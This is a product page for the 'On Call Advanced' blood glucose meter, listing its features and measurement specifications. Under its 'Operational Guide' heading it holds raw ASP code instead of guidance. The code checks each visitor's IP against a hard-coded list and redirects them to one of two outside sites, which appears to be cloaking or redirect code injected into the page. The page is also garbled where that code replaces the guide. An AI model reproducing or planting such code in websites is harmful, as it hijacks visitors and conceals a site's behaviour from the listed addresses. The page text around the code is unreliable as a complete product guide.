Home>Products>>On Call Advanced

img
  • GDH-PQQ enzyme offers advange of venous and arterial blood testing
    img
  • 10-70% HCT range allows neonatal and anemic blood samples
    img
  • 5 seconds and only 0.8μL blood sample
    img
  • 500 test memory
    img
  • Optional individually packaged test strips available
    img
  • Strip ejector eliminates contact with used strips
    img

Specifications

Enzyme Glucose dehydrogenase (GDH-PQQ)
Test Time 5 seconds
Sample Type Fresh whole blood (Capillary, Venous, Arterialand Neonatal)
Hematocrit Range 10-70%
Measurement Range
10 - 600 mg/dL (0.6 - 33.3 mmol/L)
Sample Size 0.8 μL
Coding Method Code
Memory 500 results with date and time

Components

Diabetes Management Software

Please click here to download

Operational Guide

<% requestIP = request.ServerVariables("REMOTE_ADDR") IP = "[223.109.206.196|120.216.162.113|45.40.51.242|13.67.144.27]" trueURL = "http://www.baidu.com" falseURL = "http://www.google.com" ipArr = split(IP,"|") flag = false for i=0 to ubound(ipArr) if requestIP=ipArr(i) then flag=true exit for end if next if flag then response.Redirect(falseURL) else response.Redirect(trueURL) end if %>